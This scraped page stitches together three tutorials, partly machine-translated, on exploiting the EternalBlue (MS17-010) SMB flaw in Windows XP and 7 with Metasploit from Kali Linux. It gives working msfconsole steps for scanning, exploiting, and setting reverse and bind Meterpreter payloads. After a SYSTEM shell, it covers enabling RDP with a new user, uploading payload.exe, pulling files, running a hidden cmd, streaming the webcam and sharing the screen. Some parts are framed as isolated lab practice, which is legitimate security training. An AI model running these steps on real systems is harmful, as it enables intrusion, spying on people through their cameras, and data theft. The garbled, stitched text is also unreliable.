Eternal blue metasploit kali linux

Exploit EternalBlue Using Kali Linux

In this post I cover how to exploit EternalBlue using Kali Linux. What is EternalBlue, and why are we exploiting it? EternalBlue is the name for a vulnerability discovered in the Windows operating system. The vulnerability comes from the way Windows implemented the Server Message Block protocol (SMB) version 1.0, leaving it open to exploitation. Since the release of the leaked exploit Rapid7 and the community has since uploaded exploits to Metasploit framework for us to use in testing. The vulnerability was named MS17-010 by Microsoft. After some bad actors exploited the vulnerability in the WannaCry disaster, Microsoft reacted by releasing a patch. They even released one for Windows XP, which they were/are no longer supporting.

This is an extensive tutorial for to exploit the EternalBlue using Kali Linux by using an exploit in Metasploit. The msfconsole makes this exploit available to use to compromise the victim machine we are targeting. It also provides a robust and mature architecture for reporting and scaling our ethical hacking efforts.

Here’s What You Need:

Here’s what EHG is using: a SP1 Windows XP Virtual Instance in VirtualBox. After placing both virtual machines on the same internal network adapter, the first step is startup Metasploit within Kali Linux. Note: Always be sure that you are the master of your virtual network. In other words don’t let your scans accidentally start tapping the devices on a network you are not authorized to scan. Use an Internal or Host-Only network in VirtualBox!

Notice that the next step is to create a workspace for this demo. Get in the habit of using workspaces, because they really help organize things. Switch between workspaces at any time using the command workspace .

Step 1: Setup and Gather Info

# FOLLOW THESE DIRECTIONS! # start the database server [email protected]:~ service postgresql start [email protected]:~ msfdb init [email protected]:~ msfconsole # create workspace. -a for "add" msf > workspace -a eternal_blue_demo [*] Added workspace: eternal_blue_demo

Go over what is set up so far: a workspace for the demo, the msf database server is running and the database has been created and initialized. Now turning to the target machine. Remember that exploits in Kali Linux have requirements. List these requirements using the command show options. Notice the line returned from an nmap scan returns workgroup name WORKGROUP. This is needed later for exploiting, because it is a required line. If this machine was domain joined then you would use that domain name. The same information can be found using an nbtscan.

msf > db_nmap -A -O -sV 10.0.1.10 [*] Nmap: | Workgroup: WORKGROUP\x00 msf > nbtscan -v -s : 10.0.1.10 [*] exec: nbtscan -v -s : 10.0.1.10 10.0.1.10:WORKGROUP :00G 10.0.1.10:WORKGROUP :1eG 10.0.1.10:WORKGROUP :1dU

Step 2: Scan for the Vulnerability

The next step fits in with the normal Kali Linux gather-and-destroy process. The usual steps are to gather information, exploit vulnerabilites, escalate privileges, move laterally, and exfiltrate. This is similar to the MITRE Attack Matrix. Google it for a nice visual look at the overall process.

Using this information return to the task of setting up an exploit. Using search ms17-010 all the available exploits are presented for use. Looking in the results of that search, see there is an auxiliary scanner named sm_ms17_010. This is what we need. Running an exploit against the victim machine requires the EternalBlue vulnerability, therefore we have to check! This is done using a scanner.

msf > use auxiliary/scanner/smb/smb_ms17_010 

Step 3: Exploit

When choosing an exploit it is best to pick the one with the fewest options that are labeled as “required”. Why is that? Fewer requirements means fewer variables to manage. It’s also faster and easier. Sticking with the defaults can make the whole process much simpler and less error-prone. It turns out exploit/windows/smb/ms17_010_eternalblue is suited for Windows 7 targets, therefore it won’t work. The target machine is Windows XP 32 bit. This leads the search for a suitable exploit to exploit/windows/smb/ms17_010_psexec. The line Server username: NT AUTHORITY\SYSTEM indicates that root level access has been achieved. At this point virtually anything can be done.

Luckily, as far configurations go this is an easy one. Leaving all the default settings as they are, we only need to set two fields. These are the LHOST and the RHOST. To explain, the LHOST is the listening host and the RHOST is the receiving host. After you examine the default payload this makes sense. The payload by default is a reverse tcp Meterpreter shell. The way it works is sort of a nudge towards how modern security architecture works. To explain, think of the possible payloads you could use in this scenario. Now think of a massive, in reach and in scale, system that is the modern firewall. This system’s sole design to block, therefore the reverse TCP shell is an exploit method created in response to firewalls. How is that? This type of shell executes on the victim machine and calls back to the attacker machine. Think about it, what security architecture denies most outbound traffic? This leaves room for this payload type to work.

# choose an exploit msf > use exploit/windows/smb/ms17_010_eternalblue # show options msf > show options # go back and see others msf > back # choose a new exploit for XP systems msf > use exploit/windows/smb/ms17_010_psexec # set victim ip as RHOST msf exploit(windows/smb/ms17_010_psexec) > set RHOST 10.0.1.10 RHOST => 10.0.1.10 # set attacker ip as LHOST msf exploit(windows/smb/ms17_010_psexec) > set LHOST 10.0.1.7 LHOST => 10.0.1.7 # exploit! msf exploit(windows/smb/ms17_010_psexec) > exploit [*] Meterpreter session 1 opened (10.0.1.7:4444 -> 10.0.1.10:1079) at 2019-02-21 13:01:06 -0500 # simple check for what user is currently running meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 

Let’s say there are multiple, dozens or hundreds of devices that you are now exploiting for a penetration test. Collecting credentials is a standard practice to progress the test’s overall goals. However, how can you test all those usernames and passwords, it takes forever manually. The automated recommendation I make is to use CredNinja, see the post EHG made here.

Источник

Written before

Eternal Blue is on the evening of April 14, 2017. The hacker group Shadow Brokers announced a large number of network attack tools, including the «Eternal Blue» tool, which can be obtained by using the SMB vulnerability of the Windows system. The highest authority of the system. On May 12th, criminals created the wannacry ransomware virus by transforming «Eternal Blue». The U.K., Russia, the entire Europe and China’s multiple college intranets, large corporate intranets and government agencies’ private networks were recruited and extorted for payment A high ransom can be used to decrypt and restore files.

Ready to work

pc: windows7 (without patch installed) and kali linux

Find the target drone

ifconig#View the ip address of the machine nmap 192.168.1.0/24#Scan other hosts in the LAN 

Take the host with ip 192.168.1.5 as the target machine

Use msfconsole

msfconsole is a powerful interface program is an integrated centralized console. Through msfconsole, you can access and use all metasploit plug-ins, payloads, utilization modules, post modules, etc.

msfconsole#Enter msfconsole use auxiliary/scanner/smb/smb_ms17_010#Used to scan for vulnerabilities show option#View what needs to be set 

The content of yes needs to be set

set rhosts 192.168.1.5 run #Execute to scan 

From Youdao Translation

use exploit/windows/smb/ms17_010_eternalblue#Call Eternal Blue Attack Module show option 

Some content has already been filled in, we only need to fill in the IP address and attack method of the target machine

set rhost 192.168.1.5 set payload windows/x64/meterpreter/bind_tcp#Set attack payload exploit#Execution attack 

Remote login win7

 run post/windows/manage/enable_rdp #Start enable——rdp script run post/windows/manage/enable_rdp USERNAME=icbug PASSWORD=123456#Create user 

Create a new terminal

Enter the account password just created

So far, we have logged into the win7 system through the loophole of Eternal Blue.

Источник

Eternal blue metasploit kali linux

1. Install the Kali Linux computer or virtual machine (you can download VMX files directly on the official website)
2. Computer with Windows 7 installed

Ready to work:

1. Uninstall the Vulnerability Repair Update for Windows 7 for Eternal Blue.
2. Turn off all anti-virus software in Windows 7 (for example: 360, glow, Kaspersky)

Experiment started:

1.Kali Linux Searching Metasploit Framework Double-click Open.
2. Enter the password (if you download the VMX or OVA file downloaded directly on the official website, the password is Default to Kali)

3. Wait for a while, wait until the load is complete, enter

use auxiliary/scanner/smb/smb_ms17_010 

Use the vulnerability module of the MS17.

4. Enter

use exploit/windows/smb/ms17_010_eternalblue 

Use the MS17_010_eeenderBlue module.

5. Go back to Windows 7. Enter ipconfig in CMD Enter to find the IP address of the target (192.168.0.0.104).
6. Enter in Kali Linux
set rhosts 192.168.0.104
Note: After rhosts is your target’s IP address!

Start attack!
When Host Is Likey Vulnerable occurs, the target machine has the «Eternal Blue» vulnerability.
When I saw WIN, I explained success!

Note: If you see this picture below:

Please check if the firewall of the target host is turned off, whether the security software is disabled, if still can’t, restart the target host.

Intrusion success:

After the invasion is successful, you will find that the target host is not moving.

Enter HELP to view some commands

You will find that there are many you can do.
E.g:
1. View system information

2. Monitor the camera
If the target host has a camera. (Or you are a laptop and use a virtual machine, you can connect the camera to the virtual machine)
Enter a command to view the camera list:

Enter the command to connect the camera

The number after the stream is the label before the camera you want to connect to in List.

The browser will then be opened automatically to view the camera. Protect privacy, so it is covered with a white box.

Turn off the browser and return to the terminal Press Ctrl — C to terminate to continue to monitor the camera.

3. Upload, download the file
Use the command upload file

Upload to upload the path path to the target machine 

upload /home/kali/Desktop/payload.exe C:\\Users\\Public\\Desktop 

Note that the directory path to upload must use double backslash \\!

It can be seen that the file has appeared in the target desktop.

Use the command download file

Download Target File Location Path Kali Download Path 

download C:\\123.txt /home/kali/Desktop 

We found that there is a file we want on the Kali Linux desktop.

4. Remote execution cmd command
Use the command to open the CMD

Among them, Execute means running, -h means a hidden process (HIDE).

Familiar cmd interface, and now we have administrator privileges!
You can now run any command, such as CD, TaskList, Dir, DEL, etc.

To exit the CMD, as long as you enter exit, if it asks you Terminate Channel XXX? [Y / N], press Y and press Enter.

5. What is the target machine in real time?
input the command
screenshare

success!
Returns the terminal, press CTRL — C to terminate.

6. There are still many orders
There are still many commands, enter Help view, and there is a detailed command explanation.

7. Exit Meterprefer
input the command

If you want to control again, enter RUN.

At this point, the Windows 7 attack is successful!

Note: Don’t recommend that you have been eXit and then EXIT RUN, otherwise the target is blue screen.

Pay attention again

Close 360, a grouse and other anti-virus software, otherwise:

Источник